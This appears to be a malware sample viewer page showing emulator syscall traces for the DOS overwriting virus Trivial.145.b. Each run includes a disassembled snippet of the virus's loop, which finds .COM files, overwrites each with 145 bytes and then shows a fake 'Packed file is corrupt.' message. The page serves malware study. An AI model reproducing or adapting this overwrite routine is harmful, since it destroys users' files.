Sample viewer

vx.netlux.org/Virus.DOS.Trivial.145.b

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:51:02.279078557Z	44	PC: 12a71 \| Get time 0x12a71: cmp dh, 0x1d 0x12a74: ja 0x12a43 0x12a76: mov ah, 0x4e 0x12a78: mov cl, 0x20 0x12a7a: mov dx, 0x166 0x12a7d: int 0x21 0x12a7f: mov ax, 0x3d01 0x12a82: mov dx, 0x9e 0x12a85: int 0x21 0x12a87: mov bx, ax 0x12a89: mov dx, 0x100 0x12a8c: mov cx, 0x91 0x12a8f: mov ah, 0x40 0x12a91: int 0x21 0x12a93: mov ah, 0x3e 0x12a95: int 0x21 0x12a97: mov ah, 0x4f 0x12a99: int 0x21 0x12a9b: jae 0x12a7f 0x12a9d: mov ah, 9
2018-12-17T22:51:02.283198177Z	78	PC: 12a7f \| Find first file
2018-12-17T22:51:02.290316329Z	61	PC: 12a87 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:51:02.297756867Z	64	PC: 12a93 \| Write file or device (Write 145 bytes on handle 5)
2018-12-17T22:51:02.304898052Z	62	PC: 12a97 \| Close file
2018-12-17T22:51:02.319931123Z	79	PC: 12a9b \| Find next file
2018-12-17T22:51:02.323072515Z	61	PC: 12a87 \| Open file (Filename = 'PRINT.COM')
2018-12-17T22:51:02.330176801Z	64	PC: 12a93 \| Write file or device (Write 145 bytes on handle 5)
2018-12-17T22:51:02.338249888Z	62	PC: 12a97 \| Close file
2018-12-17T22:51:02.349515652Z	79	PC: 12a9b \| Find next file
2018-12-17T22:51:02.355697164Z	61	PC: 12a87 \| Open file (Filename = 'HELLO.COM')
2018-12-17T22:51:02.365400854Z	64	PC: 12a93 \| Write file or device (Write 145 bytes on handle 5)
2018-12-17T22:51:02.372876197Z	62	PC: 12a97 \| Close file
2018-12-17T22:51:02.382003133Z	79	PC: 12a9b \| Find next file
2018-12-17T22:51:02.38546098Z	61	PC: 12a87 \| Open file (Filename = 'PHANG.COM')
2018-12-17T22:51:02.393649071Z	64	PC: 12a93 \| Write file or device (Write 145 bytes on handle 5)
2018-12-17T22:51:02.401521852Z	62	PC: 12a97 \| Close file
2018-12-17T22:51:02.410839917Z	79	PC: 12a9b \| Find next file
2018-12-17T22:51:02.414751435Z	61	PC: 12a87 \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:51:02.421645727Z	64	PC: 12a93 \| Write file or device (Write 145 bytes on handle 5)
2018-12-17T22:51:02.430653819Z	62	PC: 12a97 \| Close file
2018-12-17T22:51:02.440969198Z	79	PC: 12a9b \| Find next file
2018-12-17T22:51:02.449508771Z	61	PC: 12a87 \| Open file (Filename = 'MANDEL.COM')
2018-12-17T22:51:02.457084593Z	64	PC: 12a93 \| Write file or device (Write 145 bytes on handle 5)
2018-12-17T22:51:02.465251114Z	62	PC: 12a97 \| Close file
2018-12-17T22:51:02.47414872Z	79	PC: 12a9b \| Find next file
2018-12-17T22:51:02.477464879Z	61	PC: 12a87 \| Open file (Filename = 'PAH.COM')
2018-12-17T22:51:02.485018199Z	64	PC: 12a93 \| Write file or device (Write 145 bytes on handle 5)
2018-12-17T22:51:02.492436134Z	62	PC: 12a97 \| Close file
2018-12-17T22:51:02.50104628Z	79	PC: 12a9b \| Find next file
2018-12-17T22:51:02.505100195Z	9	PC: 12aa4 \| Display string (String= 'Packed file is corrupt.')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10412,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:27:57.863079171Z	44	PC: 12a71 \| Get time 0x12a71: cmp dh, 0x1d 0x12a74: ja 0x12a43 0x12a76: mov ah, 0x4e 0x12a78: mov cl, 0x20 0x12a7a: mov dx, 0x166 0x12a7d: int 0x21 0x12a7f: mov ax, 0x3d01 0x12a82: mov dx, 0x9e 0x12a85: int 0x21 0x12a87: mov bx, ax 0x12a89: mov dx, 0x100 0x12a8c: mov cx, 0x91 0x12a8f: mov ah, 0x40 0x12a91: int 0x21 0x12a93: mov ah, 0x3e 0x12a95: int 0x21 0x12a97: mov ah, 0x4f 0x12a99: int 0x21 0x12a9b: jae 0x12a7f 0x12a9d: mov ah, 9
2018-12-25T12:27:57.865789792Z	78	PC: 12a7f \| Find first file
2018-12-25T12:27:57.871639716Z	61	PC: 12a87 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:57.877953281Z	64	PC: 12a93 \| Write file or device (Write 145 bytes on handle 5)
2018-12-25T12:27:57.88576219Z	62	PC: 12a97 \| Close file
2018-12-25T12:27:58.849015804Z	79	PC: 12a9b \| Find next file
2018-12-25T12:27:58.852031418Z	61	PC: 12a87 \| Open file (See above)
2018-12-25T12:27:58.860687443Z	64	PC: 12a93 \| Write file or device (See above)
2018-12-25T12:27:58.868167483Z	62	PC: 12a97 \| Close file (See above)
2018-12-25T12:27:58.928975722Z	79	PC: 12a9b \| Find next file (See above)
2018-12-25T12:27:58.932665137Z	61	PC: 12a87 \| Open file (See above)
2018-12-25T12:27:58.939408742Z	64	PC: 12a93 \| Write file or device (See above)
2018-12-25T12:27:58.947606279Z	62	PC: 12a97 \| Close file (See above)
2018-12-25T12:27:59.011263395Z	79	PC: 12a9b \| Find next file (See above)
2018-12-25T12:27:59.014498034Z	61	PC: 12a87 \| Open file (See above)
2018-12-25T12:27:59.020842176Z	64	PC: 12a93 \| Write file or device (See above)
2018-12-25T12:27:59.027226552Z	62	PC: 12a97 \| Close file (See above)
2018-12-25T12:27:59.102388711Z	79	PC: 12a9b \| Find next file (See above)
2018-12-25T12:27:59.105459472Z	61	PC: 12a87 \| Open file (See above)
2018-12-25T12:27:59.112588651Z	64	PC: 12a93 \| Write file or device (See above)
2018-12-25T12:27:59.120205026Z	62	PC: 12a97 \| Close file (See above)
2018-12-25T12:27:59.175048246Z	79	PC: 12a9b \| Find next file (See above)
2018-12-25T12:27:59.177988278Z	61	PC: 12a87 \| Open file (See above)
2018-12-25T12:27:59.185729799Z	64	PC: 12a93 \| Write file or device (See above)
2018-12-25T12:27:59.19209606Z	62	PC: 12a97 \| Close file (See above)
2018-12-25T12:27:59.240741283Z	79	PC: 12a9b \| Find next file (See above)
2018-12-25T12:27:59.244444215Z	61	PC: 12a87 \| Open file (See above)
2018-12-25T12:27:59.251339753Z	64	PC: 12a93 \| Write file or device (See above)
2018-12-25T12:27:59.258242321Z	62	PC: 12a97 \| Close file (See above)
2018-12-25T12:27:59.372359112Z	79	PC: 12a9b \| Find next file (See above)
2018-12-25T12:27:59.375823484Z	9	PC: 12aa4 \| Display string (String= 'Packed file is corrupt.')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":30,"TimeBased":true,"OriginalID":10412,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:27:58.490862284Z	44	PC: 12a71 \| Get time 0x12a71: cmp dh, 0x1d 0x12a74: ja 0x12a43 0x12a76: mov ah, 0x4e 0x12a78: mov cl, 0x20 0x12a7a: mov dx, 0x166 0x12a7d: int 0x21 0x12a7f: mov ax, 0x3d01 0x12a82: mov dx, 0x9e 0x12a85: int 0x21 0x12a87: mov bx, ax 0x12a89: mov dx, 0x100 0x12a8c: mov cx, 0x91 0x12a8f: mov ah, 0x40 0x12a91: int 0x21 0x12a93: mov ah, 0x3e 0x12a95: int 0x21 0x12a97: mov ah, 0x4f 0x12a99: int 0x21 0x12a9b: jae 0x12a7f 0x12a9d: mov ah, 9